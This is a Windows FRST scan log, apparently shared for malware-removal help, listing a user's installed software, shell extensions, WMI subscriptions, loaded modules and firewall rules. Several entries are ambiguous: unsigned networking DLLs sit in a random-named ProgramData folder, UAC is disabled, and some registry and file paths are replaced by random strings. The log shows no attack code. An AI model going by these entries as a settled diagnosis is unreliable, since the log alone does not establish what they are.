Garmin Express (HKLM-x32\...\{4cc2749e-1c2a-4f48-abdf-c17069bac4da}) (Version: 6.15.0.0 - Garmin Ltd or its subsidiaries)
Garmin Express (HKLM-x32\...\{9BE7B09F-C8D2-4B1E-B83E-7387FDDA8BCD}) (Version: 6.15.0.0 - Garmin Ltd or its subsidiaries) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 79.0.3945.130 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.441 - Google LLC) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.169 - Google Inc.) Hidden
Hard Disk Low Level Format Tool 4.40 (HKLM-x32\...\Hard Disk Low Level Format Tool_is1) (Version: - HDDGURU)
HP Dropbox Plugin (HKLM-x32\...\{9646F2DC-B09E-4314-92EC-B3332900A7EE}) (Version: 36.0.191.0 - HP)
HP EmailSMTP Plugin (HKLM-x32\...\{AF9F1F16-F6B4-4A66-B789-9F00B40B08AF}) (Version: 43.0.191.0 - HP)
HP FTP Plugin (HKLM-x32\...\{7DB5EDF6-8009-4E01-AF0D-4F3E02A0287F}) (Version: 43.0.191.0 - HP)
HP Google Drive Plugin (HKLM-x32\...\{07F30E12-A85F-4EA4-A5B3-3728FAB947ED}) (Version: 36.0.191.0 - HP)
HP LaserJet MFP M28-M31 Basic Device Software (HKLM\...\{08644094-D714-4B6E-9CEB-11433F5CBDB7}) (Version: 46.2.2636.18185 - HP Inc.)
HP LaserJet MFP M28-M31 Help (HKLM-x32\...\{0DF6621D-67C2-4E12-A5CF-260E985B8743}) (Version: 0.00.0005 - HP)
HP OneDrive Plugin (HKLM-x32\...\{8ED0A60F-9F44-4B7F-9C88-CC9E0B362628}) (Version: 36.0.191.0 - HP)
HP SFTP Plugin (HKLM-x32\...\{1F0191BF-E339-4192-85D9-C369CA3FE9F1}) (Version: 43.0.191.0 - HP)
HP SharePoint Plugin (HKLM-x32\...\{96DB7179-0B69-45E1-A109-3A3A1F5BBCDF}) (Version: 43.0.191.0 - HP)
I.R.I.S OCR (HKLM-x32\...\{3913CCF7-436B-4A7A-A265-62E9FFDD03D9}) (Version: 15.2.10.1114 - HP Inc.)
iCloud (HKLM\...\{28ABC5D7-AF47-4476-A6AA-C2DD822ED40F}) (Version: 7.9.0.9 - Apple Inc.)
ID3 Tag Editor (HKLM-x32\...\{671DC096-9262-4943-A3D8-ED8A757B60D5}_is1) (Version: - id3tageditor.com)
Inside (HKLM-x32\...\{9BD4503F-F711-491D-984A-AB4ABD66B8C2}_is1) (Version: - Playdead)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.14.5067 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.0.0.102 - Intel Corporation)
Intel(R) Wireless Bluetooth(R) (HKLM\...\{00000070-0190-4FD1-8F3D-148929CC1385}) (Version: 19.70.0 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{6da487a6-c50d-494e-aaa0-6d8ce9c37ef3}) (Version: 20.10.2 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: 4.42 - Irfan Skiljan)
iRoot (HKLM-x32\...\{1295E43F-382A-4CB2-9E0F-079C0D7401BB}_is1) (Version: 1.8.9.21144 - SING)
iTunes (HKLM\...\{8F087FFD-35AC-4707-8565-58E5619CBF18}) (Version: 12.10.0.7 - Apple Inc.)
Java 8 Update 241 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180241F0}) (Version: 8.0.2410.7 - Oracle Corporation)
JDownloader 2 (HKLM-x32\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Kodi (HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Kodi) (Version: - XBMC Foundation)
Logitech Options (HKLM\...\LogiOptions) (Version: 8.10.84 - Logitech)
Master PDF Editor 3.6 (HKLM\...\Master PDF Editor 3_is1) (Version: 3.6.30 - Code Industry Ltd.)
Microsoft .NET Framework 4.8 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.8.03761 - Microsoft Corporation)
Microsoft Office Professional Plus 2007 (HKLM-x32\...\PROPLUS) (Version: 12.0.6215.1000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27012 (HKLM-x32\...\{427ada59-85e7-4bc8-b8d5-ebf59db60423}) (Version: 14.16.27012.6 - Microsoft Corporation)
Miro Video Converter (HKLM-x32\...\Miro Video Converter) (Version: 0.8.0 - Participatory Culture Foundation)
Mozilla Firefox 72.0.2 (x64 sk) (HKLM\...\Mozilla Firefox 72.0.2 (x64 sk)) (Version: 72.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 57.0.4 - Mozilla)
MPC-HC 1.7.13 (64-bit) (HKLM\...\{2ACBF1FA-F5C3-4B19-A774-B22A31F231B9}_is1) (Version: 1.7.13 - MPC-HC Team)
NeoDownloader 2.9.5 (HKLM-x32\...\{E76CDDCE-EFC0-4FE5-9972-9489CE49AA55}_is1) (Version: 2.9.5 - Neowise Software)
NVIDIA Grafický ovládač 419.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 419.72 - NVIDIA Corporation)
NVIDIA Softvér systému s podporou technológie PhysX 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
OpenOffice 4.1.5 (HKLM-x32\...\{E177AC33-EC9C-4537-8996-37ED331D9227}) (Version: 4.15.9789 - Apache Software Foundation)
Ovládací panel NVIDIA 419.72 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 419.72 - NVIDIA Corporation) Hidden
Podpora Apple aplikácií (32-bit) (HKLM-x32\...\{FD52A2FF-4D16-49C4-A2CD-DAC752C18BA2}) (Version: 8.0 - Apple Inc.)
Podpora Apple aplikácií(64-bit) (HKLM\...\{9B061D60-4E2C-4987-BFFD-423E3D477660}) (Version: 8.0 - Apple Inc.)
Product Improvement Study for HP LaserJet MFP M28-M31 (HKLM\...\{B50C256D-80E2-473E-9546-0410162F44D5}) (Version: 46.2.2636.18185 - HP Inc.)
PSPad editor (HKLM-x32\...\PSPad editor_is1) (Version: 4.6.2.2750 - Jan Fiala)
qTox (HKLM-x32\...\qTox) (Version: 1.13.0 - The qTox Project)
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.3.1500.0 - SAMSUNG Electronics Co., Ltd.)
SoftEther VPN Client (HKLM\...\softether_sevpnclient) (Version: 4.29.9680 - SoftEther VPN Project)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version: - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.10.51 - Synaptics Incorporated)
Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.0 - Ghisler Software GmbH)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Win32DiskImager version 1.0.0 (HKLM-x32\...\{3DFFA293-DF2C-4B23-92E5-3433BDC310E1}}_is1) (Version: 1.0.0 - ImageWriter Developers)
WinCDEmu (HKLM-x32\...\WinCDEmu) (Version: 4.1 - Sysprogs)
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
WinRAR 5.50 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)
XnView 2.39 (HKLM-x32\...\XnView_is1) (Version: 2.39 - Gougelet Pierre-e)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1214245489-2610092731-2950206201-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation -> Intel Corporation)
CustomCLSID: HKU\S-1-5-21-1214245489-2610092731-2950206201-1000_Classes\CLSID\{ED90173A-3B4C-4E7E-B9CF-79714425D4B5}\InprocServer32 -> C:\Program Files (x86)\PSPad editor\pspshellx64.dll () [File not signed]
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [Atheros] -> {B8952421-0E55-400B-94A6-FA858FC0A39F} => C:\Program Files (x86)\Bluetooth Suite\BtvAppExt.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [PhotoStreamsExt] -> {89D984B3-813B-406A-8298-118AFA3A22AE} => C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll [2018-12-03] (Apple Inc. -> Apple Inc.)
ContextMenuHandlers1: [WinCDEmu] -> {D0E37FD2-F675-426F-B09A-2CF37BA46FD5} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-28] (Sysprogs OU) [File not signed]
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1: [WondershareVideoConverterFileOpreation] -> {FEB746CA-95C2-485F-B386-C30D4E56D22E} => C:\Windows\SysWOW64\WSCM64.dll -> No File
ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers2: [WinCDEmu] -> {A9901FCD-B4DF-43A1-BD5D-6C9F88679497} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-28] (Sysprogs OU) [File not signed]
ContextMenuHandlers3: [FTShellContext] -> {AFF81F7B-6942-40c4-AADA-7214EF7B6DD1} => C:\Program Files (x86)\Bluetooth Suite\ShellContextExt.dll [2011-09-16] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2019-07-12] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2019-03-18] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers6: [WinCDEmu] -> {A9901FCD-B4DF-43A1-BD5D-6C9F88679497} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-28] (Sysprogs OU) [File not signed]
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1_S-1-5-21-1214245489-2610092731-2950206201-1000: [EditWithPSPad] -> {ED90173A-3B4C-4E7E-B9CF-79714425D4B5} => C:\Program Files (x86)\PSPad editor\pspshellx64.dll [2014-11-02] () [File not signed]

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]

==================== Loaded Modules (Whitelisted) =============

2018-01-08 18:39 - 2014-11-02 18:45 - 000029184 _____ () [File not signed] C:\Program Files (x86)\PSPad editor\pspshellx64.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000144896 _____ () [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\libssh2.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000077824 _____ () [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\zlib.dll
2011-09-16 14:52 - 2011-09-16 14:52 - 000053920 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\AthCopyHook.dll
2011-09-16 14:53 - 2011-09-16 14:53 - 000020128 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\athr_debug.dll
2011-09-16 14:54 - 2011-09-16 14:54 - 000040608 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BPP.DLL
2011-09-16 14:55 - 2011-09-16 14:55 - 000045216 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BTBIP.DLL
2011-09-16 14:55 - 2011-09-16 14:55 - 000161440 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\BtvAppExt.dll
2011-09-16 15:02 - 2011-09-16 15:02 - 000504480 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\filetransfer.dll
2011-09-16 15:02 - 2011-09-16 15:02 - 000092832 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\gatts.DLL
2011-09-16 15:03 - 2011-09-16 15:03 - 000106144 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\GOEP.DLL
2011-09-16 15:03 - 2011-09-16 15:03 - 000080032 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\Handsfree.dll
2011-09-16 15:04 - 2011-09-16 15:04 - 000093856 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\L2capLib.dll
2011-09-16 15:06 - 2011-09-16 15:06 - 000310432 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\ObjPush.dll
2011-09-16 15:06 - 2011-09-16 15:06 - 004974752 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\OutLookLib.dll
2011-09-16 15:07 - 2011-09-16 15:07 - 000073888 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\PhoneBook.DLL
2011-09-16 15:07 - 2011-09-16 15:07 - 000065184 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\RfcommLib.dll
2011-09-16 15:08 - 2011-09-16 15:08 - 000109216 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\sesmgr.dll
2011-09-16 15:08 - 2011-09-16 15:08 - 000284320 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\ShellContextExt.dll
2011-09-16 15:08 - 2011-09-16 15:08 - 000041632 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\sim.DLL
2011-09-16 15:08 - 2011-09-16 15:08 - 000129184 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\skypeagent.dll
2011-09-16 15:09 - 2011-09-16 15:09 - 000061088 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\Sync.dll
2011-09-16 15:09 - 2011-09-16 15:09 - 000030368 _____ (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\utils.DLL
2018-02-15 20:11 - 2016-03-21 23:15 - 000027648 _____ (Copyright (c) Code Industry Ltd ) [File not signed] C:\Windows\System32\mpelocalmon.dll
2018-01-09 21:13 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2018-01-11 15:12 - 2013-04-11 11:10 - 000073728 _____ (Intel Corporation) [File not signed] C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.dll
2019-04-02 17:10 - 2015-02-27 09:35 - 000489984 _____ (Newtonsoft) [File not signed] C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\Newtonsoft.Json.dll
2017-02-12 01:28 - 2015-09-28 19:08 - 000255488 _____ (Sysprogs OU) [File not signed] C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000355840 _____ (The cURL library, hxxp://curl.haxx.se/) [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\LIBCURL.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 002286747 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\LIBEAY32.dll
2019-10-21 13:56 - 2019-10-21 13:56 - 000416627 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\laclient\SSLEAY32.dll
2019-05-12 10:51 - 2019-05-12 10:51 - 005196800 _____ (University of Tsukuba) [File not signed] C:\Program Files\SoftEther VPN Client\VpnGatePlugin_x64.dll
2019-04-02 17:10 - 2017-03-20 15:13 - 000087552 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppCollect.dll
2019-04-02 17:10 - 2017-03-20 15:13 - 000197632 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppCommon.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea => ""="Service"
HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCea => ""="Service"

==================== Association (Whitelisted) =================

==================== Internet Explorer trusted/restricted ==========

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\localhost -> localhost

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 03:34 - 2020-01-22 20:05 - 000000027 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 localhost

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGizadie plochy.bmp
DNS Servers: 192.168.0.1
HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7rmsCe65wKzPTw5jtS38n2tVEGi => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [{0D112C7C-66E1-4D54-AEB0-EE8E3A163F04}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{E7E2670E-7962-4AFA-8A93-AD4B754A76A2}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [TCP Query User{C9127F07-56E6-49D5-A059-BE4717D6DCD0}C:\portable\utorrent-portable\utorrent.exe] => (Allow) C:\portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{046EB926-BC54-4B7B-8553-B4B8557D4320}C:\portable\utorrent-portable\utorrent.exe] => (Allow) C:\portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [{33BE3F4B-2176-4BF9-8DAD-71F2993C7E22}] => (Allow) C:\Portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [{034F37EC-98CC-400F-A7F2-54D67FA53CE7}] => (Allow) C:\Portable\utorrent-portable\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{72EA0069-1AE7-4F99-B211-021D3B204CC0}C:\program files\totalcmd\totalcmd64.exe] => (Allow) C:\program files\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH) [File not signed]
FirewallRules: [UDP Query User{7FF58BC0-AE02-48BE-B6F5-0B8F96943D04}C:\program files\totalcmd\totalcmd64.exe] => (Allow) C:\program files\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH) [File not signed]
FirewallRules: [{0957BBF0-D65F-4D9C-B51D-C765EA416DF7}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel(R) Wireless Connectivity Solutions -> )
FirewallRules: [TCP Query User{88E30C4A-334F-4EB7-935A-7BC2452751D3}C:\program files\filezilla ftp client\filezilla.exe] => (Allow) C:\program files\filezilla ftp client\filezilla.exe (Tim Kosse -> FileZilla Project)
FirewallRules: [UDP Query User{4C22E9E2-776E-4273-B65F-CB1E71B0E17B}C:\program files\filezilla ftp client\filezilla.exe] => (Allow) C:\program files\filezilla ftp client\filezilla.exe (Tim Kosse -> FileZilla Project)
FirewallRules: [TCP Query User{D5552FCB-7B8C-4A55-BCDA-866776675FD0}C:\program files\qtox\bin\qtox.exe] => (Allow) C:\program files\qtox\bin\qtox.exe () [File not signed]
FirewallRules: [UDP Query User{FDC9932A-896B-42DE-A1CE-0406F806B579}C:\program files\qtox\bin\qtox.exe] => (Allow) C:\program files\qtox\bin\qtox.exe () [File not signed]
FirewallRules: [{D75DA9A3-9755-4F80-98D4-2EF07ED17614}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{6A3D486A-8B54-46A8-90CD-2B592EB9EBF6}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{9050C82E-1247-429A-85DB-56FE67C39482}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{3D1F2024-BC68-44C6-9035-211A5E556D48}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{611DFF0B-0DAB-4871-9AD2-91E4F9D70647}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{9747B657-A166-43E8-831D-33F204BC2790}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [UDP Query User{23B54518-BFAE-44C0-BD71-1342B40C49A7}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [{0FDF3415-E5D8-493C-96D4-75A240355D2B}] => (Allow) C:\Program Files\SoftEther VPN Client\vpnclient_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{DB7D1A44-D27A-4E0E-85C6-691CEDCD37BC}] => (Allow) C:\Program Files\SoftEther VPN Client\vpnclient.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{95E4E855-A7CB-4193-AA0F-7B889EEF6193}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmgr.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{F7955E18-9789-4EEB-9C13-711CCA694B6A}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmd.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
